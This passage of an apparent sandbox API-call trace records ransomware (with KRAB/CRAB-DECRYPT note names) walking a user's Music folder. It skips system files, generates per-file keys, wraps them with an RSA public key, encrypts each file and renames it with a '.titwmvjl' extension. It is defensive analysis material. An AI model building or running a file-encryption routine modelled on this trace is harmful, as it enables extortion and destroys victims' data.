"c:\\users\\ciihmnxmn6ps\\music\\1jvic71.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\1jvic71.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0092.453] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.453] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.453] lstrcmpW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2=".") returned 1 [0092.453] lstrcmpW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="..") returned 1 [0092.453] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="2kfHC5FToJZjQ_2Uuks.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav" [0092.453] lstrlenW (lpString=".titwmvjl") returned 9 [0092.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav") returned 51 [0092.453] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.453] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav.titwmvjl") returned 60 [0092.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav") returned 51 [0092.453] lstrlenW (lpString=".wav") returned 4 [0092.453] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.454] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0092.454] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0092.454] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.454] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav") returned 51 [0092.454] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav") returned 51 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="desktop.ini") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="autorun.inf") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="ntuser.dat") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="iconcache.db") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="bootsect.bak") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="boot.ini") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="ntuser.dat.log") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="thumbs.db") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="CRAB-DECRYPT.html") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.454] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.455] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="ntldr") returned -1 [0092.455] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="NTDETECT.COM") returned -1 [0092.455] lstrcmpiW (lpString1="2kfHC5FToJZjQ_2Uuks.wav", lpString2="Bootfont.bin") returned -1 [0092.455] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav") returned 51 [0092.455] lstrlenW (lpString=".wav") returned 4 [0092.455] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.455] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0092.455] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.455] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.456] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\2kfhc5ftojzjq_2uuks.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.456] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.456] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.457] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.457] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.458] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.458] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.458] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.459] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.459] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.459] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.459] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.459] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.459] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.460] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.460] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.460] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.460] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.461] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.461] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.461] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.462] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503838) returned 1 [0092.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.462] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.462] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.463] GetLastError () returned 0x0 [0092.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.463] CryptDestroyKey (hKey=0x503838) returned 1 [0092.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.463] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.463] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.464] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0092.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.464] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.464] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.465] GetLastError () returned 0x0 [0092.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.466] CryptDestroyKey (hKey=0x503938) returned 1 [0092.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.466] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.466] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.466] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.466] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x1514e, lpOverlapped=0x0) returned 1 [0092.481] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffeaeb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.481] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1514e, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x1514e, lpOverlapped=0x0) returned 1 [0092.482] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.483] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.484] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.489] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.489] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.489] CloseHandle (hObject=0x2ac) returned 1 [0092.490] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\2kfhc5ftojzjq_2uuks.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\2kfHC5FToJZjQ_2Uuks.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\2kfhc5ftojzjq_2uuks.wav.titwmvjl"), dwFlags=0x1) returned 1 [0092.491] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.491] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.491] lstrcmpW (lpString1="bf8bO.m4a", lpString2=".") returned 1 [0092.491] lstrcmpW (lpString1="bf8bO.m4a", lpString2="..") returned 1 [0092.491] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="bf8bO.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a" [0092.491] lstrlenW (lpString=".titwmvjl") returned 9 [0092.491] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a") returned 37 [0092.491] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.491] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a.titwmvjl") returned 46 [0092.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a") returned 37 [0092.498] lstrlenW (lpString=".m4a") returned 4 [0092.499] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.499] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0092.499] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0092.499] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a") returned 37 [0092.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a") returned 37 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="desktop.ini") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="autorun.inf") returned 1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="ntuser.dat") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="iconcache.db") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="bootsect.bak") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="boot.ini") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="ntuser.dat.log") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="thumbs.db") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="CRAB-DECRYPT.html") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="ntldr") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="NTDETECT.COM") returned -1 [0092.499] lstrcmpiW (lpString1="bf8bO.m4a", lpString2="Bootfont.bin") returned -1 [0092.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a") returned 37 [0092.500] lstrlenW (lpString=".m4a") returned 4 [0092.500] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.500] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0092.500] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.500] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.500] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\bf8bo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.501] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.501] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.501] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.501] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.502] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.502] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.502] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.502] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.502] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.502] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.503] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.503] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.503] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.503] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.503] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.504] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.504] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.504] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.504] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0092.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.505] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.505] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.505] GetLastError () returned 0x0 [0092.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.505] CryptDestroyKey (hKey=0x503578) returned 1 [0092.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.505] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.505] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.506] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0092.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.506] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.506] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.506] GetLastError () returned 0x0 [0092.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.507] CryptDestroyKey (hKey=0x5032f8) returned 1 [0092.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.507] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.507] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.507] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.507] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xfe1e, lpOverlapped=0x0) returned 1 [0092.520] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff01e2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.520] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xfe1e, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xfe1e, lpOverlapped=0x0) returned 1 [0092.521] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.521] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.703] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.707] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.708] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.708] CloseHandle (hObject=0x2ac) returned 1 [0092.708] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\bf8bo.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\bf8bO.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\bf8bo.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0092.709] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.709] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.710] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0092.710] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0092.710] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock" [0092.710] lstrlenW (lpString=".titwmvjl") returned 9 [0092.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock") returned 52 [0092.710] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.710] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 61 [0092.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock") returned 52 [0092.710] lstrlenW (lpString=".lock") returned 5 [0092.710] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.710] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0092.710] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.710] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.711] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.711] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.711] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.711] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini" [0092.711] lstrlenW (lpString=".titwmvjl") returned 9 [0092.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0092.711] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.711] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini.titwmvjl") 